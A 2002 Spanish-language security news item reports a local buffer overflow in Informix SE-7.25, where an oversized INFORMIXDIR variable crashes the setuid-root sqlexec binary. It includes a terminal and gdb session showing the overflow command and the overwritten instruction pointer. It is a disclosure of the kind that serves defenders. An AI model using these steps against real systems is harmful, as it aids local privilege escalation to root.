viernes, 31 de mayo de 2002

Vulnerabilidad en Informix SE-7.25

Se ha descubierto una nueva vulnerabilidad que afecta a Informix
SE-7.25, potente paquete de gestión de Base de Datos al igual que
de desarrollo.
Recientemente se ha conocido una vulnerabilidad que afecta a Informix
SE-7.25, en el momento de redactar esta noticia solamente se tiene
constancia de su explotación sobre plataforma Linux, pero todo hace
pensar que podría exportarse esta vulnerabilidad a otras plataformas
donde corra Informix SE-7.25.

El problema se produce al definir la variable INFORMIXDIR con un
tamaño superior a 2023 bytes, lo que provoca un desbordamiento
de buffer. Esto puede permitir a un usuario con privilegios sobre
/lib/sqlexec obtener nivel de administrador euid=0, en una
instalación por defecto de Informix SE-7.25.


[pask@dimoni lib]$ ls -FAlsc
total 2588
4 drwxrwxr-x 2 informix informix 4096 May 28 22:50 boom/
1484 -rwsr-sr-x 1 root informix 1515480 Apr 20 22:09 sqlexec*
504 -rwxr-xr-x 1 informix informix 510283 Apr 20 22:09 sqlexecd*
596 -rwxr-xr-x 1 informix informix 606041 Apr 20 22:09 sqlrm*

[pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2023'`
[pask@dimoni lib]$ ./sqlexec
[pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2024'`
[pask@dimoni lib]$ ./sqlexec
Segmentation fault

[pask@dimoni lib]$ gdb ./sqlexec
(gdb) r
Starting program: /home/informix/SE-7.25/lib/./sqlexec
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)
(gdb) info registers
...
esp 0x3fffed08 0x3fffed08
ebp 0x41414141 0x41414141
esi 0x3fffedf9 1073737209
edi 0x8191571 135861617
eip 0x41414141 0x41414141
...




Antonio J. Román Arrebola
roman@hispasec.com


Más información:

Local Vulnerability in Informix SE-7.25
http://hades2.concha.upv.es/~pask/advisories/2002/Informix%20sqlexec

Informix product family
http://www-3.ibm.com/software/data/informix/